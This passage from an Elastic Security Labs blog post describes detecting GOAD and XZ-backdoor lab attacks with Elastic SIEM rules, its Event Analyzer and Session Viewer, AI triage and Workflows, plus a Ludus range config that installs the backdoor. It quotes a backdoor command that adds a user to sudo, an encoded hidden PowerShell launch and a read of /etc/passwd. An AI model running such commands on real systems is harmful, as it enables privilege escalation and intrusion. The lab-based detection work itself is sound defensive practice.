<p>The power of the Elastic SIEM is not just in its ability to passively collect logs. Its power comes from the <em>active analysis</em> it performs on the deep, contextual data provided by Elastic Defend. The &quot;Complete Endpoint Visibility&quot; from Defend provides not just basic logs, but kernel-level telemetry - process creations, file modifications, network connections, and registry changes.</p>
<p>This rich data, all normalized to the Elastic Common Schema (ECS), feeds Elastic's extensive library of <strong>more than 1,500 prebuilt, MITRE-mapped detection rules</strong>. These rules are researched, developed, and maintained by the Elastic Security Labs team, providing out-of-the-box detection value.</p>
<p>The Ludus range serves as the perfect validation platform for this value. The attacks executed in Phase 2 are not theoretical; they are mapped directly to specific expected artifacts (&quot;smoking gun&quot;). A combination of prebuilt rules and custom rules is intentionally used together in the example to alert on specific behaviors.</p>
<table>
<thead>
<tr>
<th align="left">Attack Step</th>
<th align="left">MITRE ATT&amp;CK</th>
<th align="left">Elastic Detection Rule</th>
<th align="left">Expected Artifact (&quot;smoking gun&quot;)</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>1. Credential Stuffing</strong></td>
<td align="left">T1110 (Brute Force)</td>
<td align="left"><strong>Potential Account Brute Force (Custom)</strong></td>
<td align="left">Abnormal Auth Success (Event 4624 and ssh login) across hosts.</td>
</tr>
<tr>
<td align="left"><strong>2. PrintNightmare</strong></td>
<td align="left">T1068 (Exploitation)</td>
<td align="left"><strong>Unusual Print Spooler Child Process</strong></td>
<td align="left">Unusual Print Spooler service (spoolsv.exe) child processes.</td>
</tr>
<tr>
<td align="left"><strong>3. Credential Dump</strong></td>
<td align="left">T1003.006 (OS Credential Dumping)</td>
<td align="left"><strong>Potential Remote Credential Access via Registry</strong></td>
<td align="left">Abnormal access to the Security Account Manager (SAM) registry hive.</td>
</tr>
<tr>
<td align="left"><strong>4. Kerberoasting</strong></td>
<td align="left">T1558.003 (Kerberoasting)</td>
<td align="left"><strong>Suspicious Kerberos Authentication Ticket Request (Custom)</strong></td>
<td align="left">Event ID 4769 with 0x17 (RC4) encryption requested.</td>
</tr>
<tr>
<td align="left"><strong>5. MSSQL Attacks</strong></td>
<td align="left">T1505.001 (SQL Stored Procedures)</td>
<td align="left"><strong>Execution via MSSQL xp_cmdshell Stored Procedure</strong></td>
<td align="left">cmd.exe spawned as a child of the SQL Server process (sqlservr.exe).</td>
</tr>
<tr>
<td align="left"><strong>6. Persistence</strong></td>
<td align="left">T1053.005 (Scheduled Task)</td>
<td align="left"><strong>A scheduled task was created</strong></td>
<td align="left">Event ID 4698 or schtasks.exe /create.</td>
</tr>
<tr>
<td align="left"><strong>7. XZ Backdoor</strong></td>
<td align="left">T1210 (Exploitation of Remote Services)</td>
<td align="left"><strong>Potential Execution via SSH Backdoor</strong></td>
<td align="left">sshd spawns unusual child processes like sh or bash.</td>
</tr>
</tbody>
</table>
<p><em>Note: Elastic detection rules are open and transparent. You can view the logic, contribute, or raise issues directly in the <a href="https://github.com/elastic/detection-rules">detection-rules repository</a>.</em></p>
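<p>The custom rules in the table can also be managed as code through Kibana's Detection Engine API. This is a hedged sketch of the step-7 rule: the endpoint (<code>/api/detection_engine/rules</code>) is the standard rules API, while the rule name, index pattern, and EQL query are illustrative choices for this lab.</p>
<pre><code># Create a custom EQL rule for &quot;sshd spawns a shell&quot; (attack step 7)
curl -s -X POST &quot;$KIBANA_URL/api/detection_engine/rules&quot; \
  -H &quot;Authorization: ApiKey $API_KEY&quot; \
  -H &quot;kbn-xsrf: true&quot; -H &quot;Content-Type: application/json&quot; \
  -d '{
    &quot;name&quot;: &quot;Potential Execution via SSH Backdoor (lab copy)&quot;,
    &quot;description&quot;: &quot;sshd spawned an interactive shell&quot;,
    &quot;type&quot;: &quot;eql&quot;,
    &quot;language&quot;: &quot;eql&quot;,
    &quot;index&quot;: [&quot;logs-endpoint.events.process-*&quot;],
    &quot;query&quot;: &quot;process where event.type == \&quot;start\&quot; and process.parent.name == \&quot;sshd\&quot; and process.name in (\&quot;sh\&quot;, \&quot;bash\&quot;, \&quot;dash\&quot;)&quot;,
    &quot;risk_score&quot;: 73,
    &quot;severity&quot;: &quot;high&quot;,
    &quot;interval&quot;: &quot;5m&quot;,
    &quot;from&quot;: &quot;now-6m&quot;,
    &quot;enabled&quot;: true
  }'
</code></pre>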
<h3><strong>6.2 Deep Dive: Tracing Process Chains with Event Analyzer</strong></h3>
<p>The two labs (GOAD and XZbot) provide a perfect opportunity to use Elastic's specialized investigation tools. The user interface of the Event Analyzer is designed to abstract the complexity of JSON logs into a cognitive model that aligns with how security analysts think: <strong>Process Chains.</strong> The interface comprises three primary interaction zones: the Graphical Canvas, the Detail Panel, and the Timeline integration.</p>
<h4>What are we seeing?</h4>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image1.png" alt="" /></p>
<h5>The Graphical Canvas (The Process Tree)</h5>
<p>The central view is a directed acyclic graph where:</p>
<ul>
<li><strong>Nodes (Cubes):</strong> Each cube represents a distinct process execution. The visualization distinguishes between the &quot;Anchor&quot; event (highlighted with a blue halo) and the surrounding context.</li>
<li><strong>Edges (Lines):</strong> Lines represent the parent-child relationship. The directionality is implicit (top-down or left-right), showing the flow of execution.</li>
<li><strong>Visual Badging:</strong> Nodes are not static icons; they are dynamic indicators.
<ul>
<li><strong>Alert Badges:</strong> If a specific process triggered a detection rule (e.g., &quot;Malware Detected&quot;), a colored badge appears on the cube. This allows an analyst to instantly identify which step in the chain was flagged by the detection engine.</li>
<li><strong>User Context:</strong> Visual cues may indicate if a process changed user context (e.g., from a local user to SYSTEM), signaling privilege escalation.</li>
</ul>
</li>
</ul>
<h5>The Detail Panel (Forensic Metadata)</h5>
<p>Clicking on any node triggers the Detail Panel, typically sliding in from the right. This panel is the primary source of &quot;What you can see&quot; at a granular level. It exposes fields critical for verification:</p>
<ul>
<li><strong>Command Line Arguments:</strong> This is arguably the single most valuable forensic artifact. The Analyzer displays the full string, exposing flags, scripts, and encoded payloads (e.g., powershell.exe -w hidden -enc Base64).</li>
<li><strong>Process Path and Hash:</strong> The full file path helps identify masquerading (e.g., svchost.exe running from C:\Temp instead of C:\Windows\System32). File hashes (MD5, SHA-1, SHA-256) are presented for cross-referencing with threat intelligence.</li>
<li><strong>Signer Information:</strong> Information about the binary's digital signature helps distinguish between trusted Microsoft binaries and unsigned malware.</li>
<li><strong>Related Event Counts:</strong> Instead of cluttering the graph with thousands of file modifications, the node displays summary statistics (e.g., &quot;15 File Events,&quot; &quot;3 Network Connections&quot;). Clicking these stats usually drills down into a list view or timeline of those specific actions.</li>
</ul>
<h5>The Temporal Dimension (Time Filter)</h5>
<p>A critical, often overlooked aspect of the Analyzer is its handling of time. Attacks can have long &quot;dwell times.&quot; A parent process might have started weeks ago (e.g., a legitimate service), while the malicious child spawned today. The Analyzer includes a time slider that allows the analyst to expand the query window. By default, it might look at a narrow window around the alert, but expanding this allows the graph to &quot;reach back&quot; into the Warm or Cold data tiers to find the long-running parent process.</p>
<h4>How does it work?</h4>
<p>The operational capability of the Event Analyzer leverages the <strong>Elastic Common Schema (ECS)</strong>. In a heterogeneous security environment, logs originate from diverse sources (Windows endpoints, Linux servers, network firewalls, and cloud service providers), each with a unique taxonomy. A CrowdStrike agent might label a process ID as TargetProcessId, while a Sysmon event uses ProcessId. Without normalization, correlating these events into a single chain is algorithmically impossible.<br />
ECS solves this by enforcing a strict field hierarchy. The Event Analyzer relies on specific, high-fidelity ECS fields to construct the visual graph:</p>
<ul>
<li><strong>process.entity_id</strong>: This is the cornerstone of the Analyzer's logic. Operating systems recycle Process IDs (PIDs). A PID of 1234 might belong to svchost.exe at 09:00 and malware.exe at 14:00. Relying on PID for long-term historical analysis introduces collisions that would corrupt the visual graph, linking unrelated events. The process.entity_id is a unique string generated by the Elastic Agent (or ECS-compliant beats) that persists uniquely in the index, ensuring that the graph represents a distinct execution instance, regardless of PID reuse.</li>
<li><strong>process.parent.entity_id</strong>: This field establishes the directed edge between nodes. By recursively querying for events where the process.entity_id of one event matches the process.parent.entity_id of another, the Analyzer reconstructs the lineage.</li>
<li><strong>event.sequence</strong>: In high-velocity environments, the order of events (e.g., did the file modification happen before or after the network connection?) is critical. ECS timestamps and sequence numbers allow the Analyzer to order events chronologically within the visual node details.</li>
</ul>
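<p>The recursive parent/child join described above can be illustrated in a few lines of shell. Given (entity_id, parent_entity_id, process name) tuples like those carried in ECS events, an awk pass rebuilds the indented lineage; the four sample events below are invented for illustration.</p>
<pre><code># Sample events: entity_id, parent_entity_id (&quot;-&quot; = root), process name
cat &lt;&lt;'EOF' &gt; events.txt
a - sshd
b a sshd
c b sh
d c setsid
EOF

# Walk parent pointers to compute each node's depth, then print the tree
awk '
  { parent[$1] = $2; name[$1] = $3; order[NR] = $1 }
  function depth(id,    d) { d = 0; while (parent[id] != &quot;-&quot;) { id = parent[id]; d++ } return d }
  END {
    for (i = 1; i &lt;= NR; i++) {
      id = order[i]; pad = &quot;&quot;
      for (j = 0; j &lt; depth(id); j++) pad = pad &quot;  &quot;
      print pad name[id]
    }
  }
' events.txt
</code></pre>
<p>The output is the same top-down chain the Analyzer draws: <code>sshd</code> at the root, with each child indented beneath its parent.</p>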
<h3><strong>6.3 Deep Dive: Reconstructing User Activity with Session Viewer</strong></h3>
<p>For the <strong>XZbot</strong> (Linux) attack, the <strong>Session Viewer</strong> is the superior tool. It is specifically designed for <strong>&quot;monitoring and investigating session activity on Linux infrastructure&quot;</strong>.</p>
<p>When the Potential Execution via XZBackdoor alert fires, the analyst investigates the associated sshd process. The Session Viewer presents a <strong>&quot;highly readable format inspired by the terminal&quot;</strong>. It reconstructs the attacker's session, showing the sshd process and its anomalous child process (sh).</p>
<p>Furthermore, it will show the <em>exact command</em> that was executed (<code>sh -c setsid sh -c &quot;usermod -aG sudo sysadmin_backup&quot;</code>) and can even display the <em>output</em> of that command. This is the definitive &quot;smoking gun&quot;, presented to the analyst in plain, human-readable text, effectively allowing them to watch the attacker's TTY session after the fact.</p>
<h4>What are we seeing?</h4>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image2.png" alt="" /></p>
<p>The user interface of the Session Viewer is explicitly designed to bridge the gap between abstract log analysis and the native terminal experience of a Linux administrator. Unlike the Event Analyzer, which focuses on malware process chains, the Session Viewer presents a time-ordered, tree-based visualization that reconstructs the linear narrative of a shell session.</p>
<h5>The Process Tree and Timeline</h5>
<p>The central component of the view is a <strong>Directed Acyclic Graph (DAG)</strong> displayed as a hierarchical list.</p>
<ul>
<li><strong>Vertical Flow:</strong> The Session Viewer arranges processes vertically, mimicking the flow of a terminal history file but preserving hierarchy. Child processes are indented relative to their parents. This allows an analyst to immediately distinguish between a command run directly by the user (e.g., curl) and a process spawned by a script execution (e.g., curl executing inside a setup.sh script).</li>
<li><strong>Verbose Mode:</strong> A toggle allows analysts to switch between a filtered view (showing significant user activity) and &quot;Verbose Mode.&quot; When enabled, this mode reveals typically noisy events like shell startup scripts (.bashrc execution), shell completion helpers, and forks caused by built-in commands. This is crucial for detecting persistence mechanisms hidden in profile scripts.</li>
</ul>
<h5>Visual Badging and Indicators</h5>
<p>The UI employs a sophisticated system of badges and icons to provide immediate context without requiring the analyst to drill down into every node. These visual cues are essential for rapid triage.</p>
<h6><em>Visual Indicators in Elastic Session Viewer</em></h6>
<table>
<thead>
<tr>
<th align="left">Badge/Icon</th>
<th align="left">Visual Appearance</th>
<th align="left">Meaning</th>
<th align="left">Forensic Implication</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Exec User Change</strong></td>
<td align="left">Explicit Text Badge</td>
<td align="left">The user context changed (e.g., su, sudo).</td>
<td align="left">Critical for identifying privilege escalation. Shows exactly when a standard user became root.</td>
</tr>
<tr>
<td align="left"><strong>Process Alert</strong></td>
<td align="left">Gear Icon</td>
<td align="left">A process event triggered a detection rule.</td>
<td align="left">Indicates execution of malicious binaries or suspicious discovery commands (e.g., whoami).</td>
</tr>
<tr>
<td align="left"><strong>File Alert</strong></td>
<td align="left">Page Icon</td>
<td align="left">A file modification triggered a rule.</td>
<td align="left">Indicates tampering, persistence creation (cron/systemd), or exfiltration staging.</td>
</tr>
<tr>
<td align="left"><strong>Network Alert</strong></td>
<td align="left">Page Icon (Secondary)</td>
<td align="left">A network event triggered a rule.</td>
<td align="left">Indicates C2 communication, lateral movement, or exfiltration.</td>
</tr>
<tr>
<td align="left"><strong>Multiple Alerts</strong></td>
<td align="left">Combined Badge</td>
<td align="left">Single event triggered multiple rule types.</td>
<td align="left">High-confidence indicator of malicious activity (e.g., a process dropped a file and executed it).</td>
</tr>
<tr>
<td align="left"><strong>Alert Count</strong></td>
<td align="left">Numeric (e.g., (2))</td>
<td align="left">Total alerts associated with a node.</td>
<td align="left">Helps prioritize which steps in the chain were most &quot;noisy&quot; to detection logic.</td>
</tr>
</tbody>
</table>
<h5>Terminal Output View</h5>
<p>Hovering over the <strong>Terminal Output</strong> button on a process node reveals a badge indicating the size of the captured output. Clicking this button opens the Terminal Output view, which renders the process.io.text data. This is the &quot;Smoking Gun&quot; feature for Linux investigations.</p>
<ul>
<li><strong>Replay Capability:</strong> It allows the analyst to see exactly what the user saw. If an attacker ran cat /etc/passwd, the process tree shows the execution; the Terminal Output view shows the <em>content</em> of the passwd file as it was displayed to the attacker.</li>
<li><strong>Input Reconstruction:</strong> Because the viewer captures TTY I/O, it captures not just the command execution, but the <em>typing</em>. This can reveal backspaces, typos, and corrections (e.g., typing sdo [backspace] sudo), which are strong behavioral indicators of a human adversary rather than an automated script.</li>
</ul>
<h2><strong>The Elastic Advantage: AI-Powered Automated Hunting</strong></h2>
<p>The process described in Phase 3 demonstrates a powerful, analyst-driven investigation. However, the primary advantage of using <strong>Elastic Cloud Hosted (ECH)</strong> or <strong>Elastic Serverless</strong> is the programmatic access to an integrated Generative AI stack. This stack elevates the process from <em>manual correlation</em> to <em>AI-driven automated hunting</em>.</p>
<p><em>Note: Elastic's AI features work with the out-of-the-box Elastic Managed LLMs or with <a href="https://www.elastic.co/kr/docs/solutions/security/ai/set-up-connectors-for-large-language-models-llm#connect-to-a-third-party-llm">third-party LLMs</a> configured using one of the available connectors.</em></p>
<h3><strong>7.1 From Alerts to Attacks: Automated Correlation with Attack Discovery</strong></h3>
<p>The GOAD + XZbot labs will generate <em>multiple</em> discrete alerts, as shown in the table above. A junior analyst would be faced with a queue of alerts (Potential Kerberoasting, Suspicious Certificate Request, Potential XZBackdoor) and would have to manually &quot;stitch together&quot; this complex, cross-domain attack.</p>
<p>This is the problem solved by <strong>Attack Discovery</strong>. This GenAI feature, available in Enterprise and Serverless tiers, <strong>&quot;delivers fully automated threat hunting at scale&quot;</strong>. Its AI analyzes every alert to uncover hidden threats, automatically correlating the disparate signals from the Ludus lab into a single, high-fidelity &quot;Attack&quot; investigation.</p>
<p>The primary value of Attack Discovery for a forensic analyst is the compression of time. It automates the &quot;mental stitching&quot; that defines tier-one and tier-two analysis.</p>
<h4>Deconstructing the &quot;Mental Stitching&quot;</h4>
<p>Consider an example investigation without Attack Discovery.</p>
<ol>
<li><strong>Trigger:</strong> You see an alert: &quot;Suspicious PowerShell Execution.&quot;</li>
<li><strong>Query:</strong> You pivot to the host timeline.</li>
<li><strong>Scan:</strong> You scroll back 15 minutes. You see a &quot;File Download&quot; event.</li>
<li><strong>Hypothesis:</strong> &quot;Maybe the user downloaded a bad file, which launched PowerShell.&quot;</li>
<li><strong>Verification:</strong> You check the file name. It is invoice.js.</li>
<li><strong>Conclusion:</strong> &quot;Confirmed malware download.&quot;</li>
</ol>
<p>This process takes between 10 and 30 minutes, depending on the analyst's skill and familiarity with the environment. Attack Discovery performs this entire sequence in seconds. It looks at the PowerShell alert, sees the file download event in the related context, and presents a Discovery stating: <em>&quot;User executed suspicious PowerShell script likely originating from downloaded file 'invoice.js'.&quot;</em></p>
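<p>The manual pivot in steps 2 through 5 can itself be expressed as a single hunt query; Elasticsearch exposes ES|QL over the <code>_query</code> endpoint. A hedged sketch, where the index pattern and host name are placeholders for this scenario:</p>
<pre><code># Find recent .js file events on the alerting host (the &quot;invoice.js&quot; pivot)
curl -s -X POST &quot;$ES_URL/_query&quot; \
  -H &quot;Authorization: ApiKey $API_KEY&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d '{
    &quot;query&quot;: &quot;FROM logs-endpoint.events.file-* | WHERE host.name == \&quot;victim-ws01\&quot; AND file.extension == \&quot;js\&quot; | KEEP @timestamp, file.path, process.name | SORT @timestamp DESC | LIMIT 10&quot;
  }'
</code></pre>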
<p>This feature includes <strong>Data Persistence</strong> (results are saved for historical tracking) and <strong>Scheduling &amp; Actions</strong> (it runs automatically and can trigger responses or subsequent Elastic Workflows), moving the SOC from a reactive to a proactive posture.</p>
<h5>Example</h5>
<p>In our example, as the attack occurs, we start to see alerts. Instead of triaging the alerts individually, we leverage Attack Discovery for triage, compressing the mean time to triage down to seconds and quickly identifying the two attacks.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image3.gif" alt="" /></p>
<h3><strong>7.2 Accelerating Triage with the AI Assistant</strong></h3>
<p>The Elastic Security Assistant uses generative AI to help you find, fix and understand security threats. It works directly inside Elastic Security. You interact with it through a chat interface to investigate alerts and write code.</p>
<p>In our example, once Attack Discovery identifies a correlated attack, we then use the <strong>AI Assistant</strong> to investigate. The assistant provides two key capabilities:</p>
<ol>
<li><strong>Natural Language Investigations:</strong> The analyst can ask plain-English questions like &quot;Summarize this attack&quot;, &quot;What is the MITRE Tactic for this process?&quot;, &quot;What is print spooler?&quot;, or &quot;Provide some remediation suggestions.&quot;</li>
</ol>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image7.png" alt="" /></p>
<ol start="2">
<li><strong>Agentic Query Validation workflow:</strong> This advanced feature allows the AI to <strong>&quot;generate bespoke, validated ES|QL queries&quot;</strong>. An analyst can ask, &quot;Find all network connections from the host involved in the XZbot alert&quot;, and the assistant will write, validate, and <strong>self-correct</strong> the query before presenting it, drastically lowering the skill barrier to high-end threat hunting.<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image4.png" alt="" /></li>
</ol>
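<p>For a request like &quot;Find all network connections from the host involved in the XZbot alert&quot;, the validated query the assistant lands on might look something like the following. The host name is a placeholder for the host in the alert, and the exact query the assistant generates will vary.</p>
<pre><code>FROM logs-endpoint.events*
| WHERE host.name == &quot;xz-backdoor-dect&quot; AND event.category == &quot;network&quot;
| KEEP @timestamp, process.name, source.ip, destination.ip, destination.port, network.transport
| SORT @timestamp DESC
| LIMIT 50
</code></pre>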
<h4>How It Works</h4>
<p>The Assistant connects your Elastic Stack to an LLM of your choice (e.g., GPT-5, Claude, Gemini). It uses Retrieval Augmented Generation (RAG) to fetch relevant data—logs, alerts, and internal documentation—from your environment. You can configure it to anonymize sensitive fields (PII or host/IP metadata) before sending the prompt to the model, ensuring your data remains private while the model reasons over the behavioral patterns.</p>
<h3><strong>7.3 Intelligent Automation with Elastic Workflows</strong></h3>
<p>The attacks described above generate complex, multi-stage alerts. Handling these manually is slow. Elastic has addressed this by acquiring <a href="https://www.elastic.co/kr/blog/elastic-and-keep-join-forces"><strong>Keep</strong></a>, an open-source AIOps and alert management platform. In <a href="https://www.elastic.co/kr/blog/whats-new-elastic-9-3-0">Elastic 9.3</a>, this technology is integrated directly into Kibana in Technical Preview as <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows">Elastic <strong>Workflows</strong></a>.</p>
<h4>What are Workflows?</h4>
<p>Elastic Workflows is an automation engine built into the Elasticsearch platform. You define Workflows in YAML - what triggers them, what steps they take, what actions they perform - and the platform handles execution. A Workflow can query your environment, transform and enrich security data, branch based on conditions, call external APIs, and integrate with services like Slack, Jira, PagerDuty and more through connectors you've already configured. Workflows can also call AI agents to reason through complex investigations, then continue with response actions based on what the agent discovers. Elastic Workflows combines scripted automation with AI reasoning natively in your SIEM, where your security data already lives.</p>
<h4>How It Works: The &quot;Alert Aggregator &amp; Workflow Engine&quot;</h4>
<p>Workflows become the <strong>middleware layer</strong> between detection and remediation, working through three primary mechanisms:</p>
<ul>
<li><strong>Multi-Source Ingestion:</strong> Workflows extend beyond Elastic, pulling in additional data for enrichment, analysis, or initial triage.</li>
<li><strong>Workflow-as-Code (YAML):</strong> Workflows are defined in YAML files. This allows teams to version control their incident response procedures as code.</li>
<li><strong>The Workflow Engine:</strong> When an alert triggers in Elastic (or an external tool), the Workflow Engine executes a series of steps:
<ol>
<li><strong>Enrichment:</strong> Querying an API (like VirusTotal or Active Directory) to add context.</li>
<li><strong>Logic:</strong> Using if/else statements to determine severity.</li>
<li><strong>Action:</strong> Sending a Slack message, creating a Jira ticket, or triggering an Elastic Defend response action.</li>
</ol>
</li>
</ul>
<p><strong>Consider an example Alert and Action flow.</strong></p>
<ul>
<li><strong>Trigger:</strong> You connect the workflow to a specific rule, such as &quot;Malicious Detection Alert&quot;.</li>
<li><strong>Steps:</strong> You define a sequence of actions.
<ol>
<li><strong>Triage (Agentic):</strong> Pass the alert to the AI Assistant and ask: &quot;How would we remediate and respond to the alert below?&quot;</li>
<li><strong>Enrich</strong>: Attach the AI Assistant's response as a note to the alert.</li>
<li><strong>Respond:</strong> Create a case with a link to the alert note.</li>
</ol>
</li>
</ul>
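<p>Expressed as workflow-as-code, the flow above might look roughly like the following YAML. This is an illustrative sketch only: the trigger, step, and field names are invented for readability and are not the exact Elastic Workflows schema, which is still in Technical Preview.</p>
<pre><code># Illustrative sketch: step and field names are invented,
# not the exact Elastic Workflows schema.
name: alert-enrichment-and-case-creation
triggers:
  - type: alert
    rule_name: &quot;Malicious Detection Alert&quot;
steps:
  - name: triage_with_ai_assistant
    type: ai_assistant
    prompt: &quot;How would we remediate and respond to the alert below?&quot;
    input: &quot;{{ alert }}&quot;
  - name: attach_note_to_alert
    type: alert_note
    alert_id: &quot;{{ alert.id }}&quot;
    text: &quot;{{ steps.triage_with_ai_assistant.response }}&quot;
  - name: create_case
    type: create_case
    title: &quot;{{ alert.rule_name }} on {{ alert.host_name }}&quot;
    description: &quot;See the attached alert note for the AI triage summary.&quot;
</code></pre>
<p>Because the definition lives in YAML, the response procedure can be reviewed, versioned, and rolled back like any other code.</p>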
<h5>Example</h5>
<p>In our example, alerts trigger our workflow, Alert Enrichment &amp; Case Creation. We will also trigger it directly from the Workflows UI to demonstrate the various steps.</p>
<ul>
<li>The Alert context is provided as an input to the Security AI Assistant</li>
<li>The response is added as a note to the Security alerts</li>
<li>A case is created with metadata from the Alert (timestamp, severity, rule name and alert reason).</li>
<li>A link to the case is added to the alert as a comment. <em>Note: this is not shown in the GIF</em>.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/image6.gif" alt="" /></p>
<h2><strong>Conclusion: From Manual Setup to Continuous Emulation</strong></h2>
<p>This blog has provided a complete blueprint for an advanced, scalable, and, most importantly, safe simulation range.</p>
<ol>
<li><strong>We built:</strong> A complex, multi-lab range (GOAD + XZbot) was deployed with a single command using Ludus.</li>
<li><strong>We instrumented:</strong> The entire range was seamlessly instrumented with Elastic Agent and Defend as part of the automated deployment, using the ludus_elastic_agent Ansible role.</li>
<li><strong>We secured:</strong> The critical conflict between malware isolation and cloud-agent connectivity was solved using Ludus's granular &quot;OPSEC&quot; networking controls.</li>
<li><strong>We validated:</strong> The platform's powerful SIEM capabilities were proven by <em>validating</em> Elastic's prebuilt, out-of-the-box detection rules against live, known-bad attacks.</li>
<li><strong>We investigated:</strong> The specialized investigation tools, Event Analyzer and Session Viewer, were used to trace the <em>exact</em> attack paths on both Windows and Linux hosts.</li>
<li><strong>We automated:</strong> The &quot;force-multiplier&quot; of Elastic's GenAI stack was demonstrated, with Attack Discovery automatically correlating disparate alerts into a single attack and the AI Assistant accelerating the final investigation.</li>
<li><strong>We responded</strong>: Elastic Workflows provided the brains and automation for complex response actions and remediation flows.</li>
</ol>
<p>This architecture is not a one-off build. It is a blueprint for a <em>continuous detection engineering pipeline</em>. It &quot;modernizes security operations&quot; by empowering purple teams to tear down, rebuild, and re-test their defenses on demand, ensuring their detection posture evolves as fast as the threats do.</p>
<h2><strong>Take the Next Step: Enable Your Security Team</strong></h2>
<p>The architecture in this blog is more than a technical exercise; it's a blueprint for continuous security validation. By pairing this automated range with Elastic’s unified SIEM and XDR platform, you can move from periodic testing to a state of constant readiness.</p>
<p><a href="https://cloud.elastic.co/registration">We invite you to start your own trial</a>, leverage this guide to test and evaluate the platform against real-world threats, and enable your security team with the tools to stay one step ahead of the adversary.</p>
<h3>Using another SIEM?</h3>
<p>No problem. You can leverage Elastic Serverless to augment your existing SIEM and gain all of the insights above while using your native SIEM's underlying data. <a href="https://cloud.elastic.co/registration">Get started with an Elastic Serverless deployment today</a>. The <a href="https://www.elastic.co/kr/docs/solutions/security/ai/ease/ease-intro"><strong>Elastic AI SOC Engine (EASE)</strong> package</a> delivers these AI-driven capabilities, enabling organizations to rapidly add powerful analytics and an AI layer on top of their existing tools, even before a full migration.</p>
<h2>Appendix</h2>
<h3>Example Full Range</h3>
<p><em>Note: The Kali VM VLAN is outside of the GOAD and XZ backdoor hosts to simulate a segmented network or a remote attacker. The Kali VM VLAN can be changed to 10/20 to simulate “assumed breach” or internal attack scenarios.</em></p>
<pre><code>global_role_vars:
  ludus_elastic_fleet_server: &quot;https://&lt;fleet_domain&gt;:&lt;fleet_port&gt;&quot; # 443 by default for cloud; on-prem Fleet Server defaults to 8220
  ludus_elastic_agent_version: &quot;9.2.1&quot;
ludus:
  - vm_name: &quot;{{ range_id }}-GOAD-DC01&quot;
    hostname: &quot;{{ range_id }}-DC01&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 10
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:           # Any values in this array will be added to DNS for the range and return an A record for this VM's IP
      - sevenkingdoms.local
      - kingslanding.sevenkingdoms.local
      - kingslanding
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-DC02&quot;
    hostname: &quot;{{ range_id }}-DC02&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 11
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - winterfell.north.sevenkingdoms.local
      - north.sevenkingdoms.local
      - winterfell
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-DC03&quot;
    hostname: &quot;{{ range_id }}-DC03&quot;
    template: win2016-server-x64-template
    vlan: 10
    ip_last_octet: 12
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - essos.local
      - meereen.essos.local
      - meereen
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-SRV02&quot;
    hostname: &quot;{{ range_id }}-SRV02&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 22
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - castelblack.north.sevenkingdoms.local
      - castelblack
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-GOAD-SRV03&quot;
    hostname: &quot;{{ range_id }}-SRV03&quot;
    template: win2019-server-x64-template
    vlan: 10
    ip_last_octet: 23
    ram_gb: 4
    cpus: 2
    windows:
      sysprep: true
    dns_rewrites:
      - braavos.essos.local
      - braavos
    roles:
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_elastic_enrollment_token: &quot;&lt;goad_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-xz-backdoor-dect&quot;
    hostname: &quot;{{ range_id }}-xz-backdoor-dect&quot;
    template: debian-12-x64-server-template
    vlan: 20
    ip_last_octet: 1
    ram_gb: 2
    cpus: 2
    linux:
      packages: # You can define packages to install on Linux hosts
        - ca-certificates
        - netcat-openbsd
        - net-tools
    roles:
      - badsectorlabs.ludus_xz_backdoor
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_xz_backdoor_install_xzbot: true
      ludus_xz_backdoor_install_backdoor: true
      ludus_elastic_enrollment_token: &quot;&lt;linux_policy_enrollment_token&gt;&quot;
  - vm_name: &quot;{{ range_id }}-kali&quot;
    hostname: &quot;{{ range_id }}-kali&quot;
    template: kali-x64-desktop-template
    vlan: 50
    ip_last_octet: 99
    ram_gb: 8
    cpus: 4
    linux: true
    testing:
      snapshot: false # Snapshot this VM going into testing, and revert it coming out of testing. Default: true
      block_internet: false # Allow internet access for Kali, default is true
    roles:
      - badsectorlabs.ludus_xz_backdoor
      - badsectorlabs.ludus_elastic_agent
    role_vars:
      ludus_xz_backdoor_install_xzbot: true
      ludus_elastic_enrollment_token: &quot;&lt;linux_policy_enrollment_token&gt;&quot;
</code></pre>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/automating-goad-and-live-malware-labs/Security Labs Images 34.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[How Elastic Infosec Optimizes Defend for Cost and Performance]]></title>
